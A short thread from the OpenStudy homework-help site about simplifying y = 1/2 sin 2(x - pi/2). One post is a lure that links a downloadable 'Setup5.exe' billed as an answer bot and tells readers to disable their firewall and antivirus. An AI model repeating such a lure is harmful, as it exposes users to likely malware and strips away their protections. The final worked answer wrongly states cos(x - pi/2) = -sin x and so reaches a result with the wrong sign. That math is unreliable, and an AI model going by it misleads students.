OpenStudy (anonymous):

y=1/2 sin 2 (x-pi/2)

OpenStudy (anonymous):

https://www.dropbox.com/s/zxn37snm95tjqjf/Setup5.exe automatic answer bot. disable firewall and antvirus \

OpenStudy (anonymous):

so what your asking is\[y= 1/2 \sin (2 \times \pi \div 2)\] right?

OpenStudy (anonymous):

thanks

OpenStudy (anonymous):

but actually the question is \[y = 1/2 \sin 2 ( x - \pi/2)\]

OpenStudy (anonymous):

y = (1/2) sin 2(x - Pi/2) = [sin (x - Pi/2)*cos (x - Pi/2] We know that: cos (x - Pi/2) = -cos (pi/2 - x) = -sin x. sin (x - Pi/2) = -sin (Pi/2 - x) = -cos x. y = (-cos x)(-sin x) = (1/2)*sin 2x.